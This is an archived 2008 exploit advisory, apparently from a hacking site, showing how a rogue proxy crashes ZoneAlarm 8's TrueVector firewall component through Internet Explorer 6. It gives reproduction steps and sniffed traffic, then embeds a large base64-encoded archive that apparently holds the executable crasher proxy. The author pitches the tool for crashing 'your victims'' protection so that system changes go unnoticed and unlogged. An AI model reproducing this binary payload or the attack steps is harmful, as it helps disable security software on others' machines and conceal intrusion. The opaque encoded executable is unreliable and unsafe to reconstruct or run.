AOH :: HP Unsorted C :: VA1401.HTM

Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)



Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)
Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)




Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)
=========================================
- Keep ZoneALarm 8 running with vsmon.exe running (which runs by default)

- On System A : Run the rogue proxy (attached) za_crasher_proxy.exe and set a port number (eg: za_crasher_proxy.exe 5938)

- On System B : Use Internet Explorer 6 and set proxy settings as IP of System A and port 5938 for HTTP connections
By default IE 6 has homepage as 
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome 
Leave it unchanged.

- Keep za_crasher_proxy.exe running on System A.

- Launch IE on System B. It will goto 
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome 

- Stop it and type any other web URL in the address bar. IE tries to locate that URL via the set proxy IP and port.

Sniffed Output :

00000000  17 24 0A 20 00 1A A9 D8  81 88 13 80 00 00 00 00   .$. .... 

....... 


00000010  00 01 00 00 00 0F 00 00  00 00 00 00 00 00 00 00   ........ 

....... 


00000020  00 00 00 00 00                                     .....



CONNECT 208.185.174.65:443 HTTP/1.0
Host: 208.185.174.65:443
Proxy-Connection: Keep-Alive
Accept-Encoding: gzip
Accept: */*
Content-Type: text/plain
User-Agent: ZoneAlarm/8.0.020.000 (oem-1025; en-US) ZSP/2.2

- ZoneAlarm 8's TrueVector Component crashes with a message box, minidump file in Temp and on closing the message box, it restarts after a few moments

- ZoneAlarm leaves the system unprotected (HIDS module alone) till the time TrueVector component is back.

- Demonstration Video links :

http://www.fileden.com/files/2008/9/18/2104312/rogue_proxy_without_za8_running.rar 

http://www.fileden.com/files/2008/9/18/2104312/rogue_proxy_crashing_za8issuite.rar 


ZoneAlarm 8 Internet Security Suite Crasher (Rogue Proxy)crashes ZA8 on IE 6 WIndows XP SP3.
 
Can be used to used as a rogue proxy (3128,8080,etc.) to crash your victims' ZA HIDS component for a few moments rendering your victim vulnerable to unnoticed, unlogged system changes.
 
[ Not tested with other browsers. Might work on IE7,8 and others. Seems to be a Browser Independent bug ]


za_crasher_proxy.b64 (Base64 Encoded File)



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
0mUj+/UJr5crMjh/Kw7pva/6QMQ9ewBABwA
Discovered on 9:48 PM 9/8/2008

-- QUAKERDOOMER

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.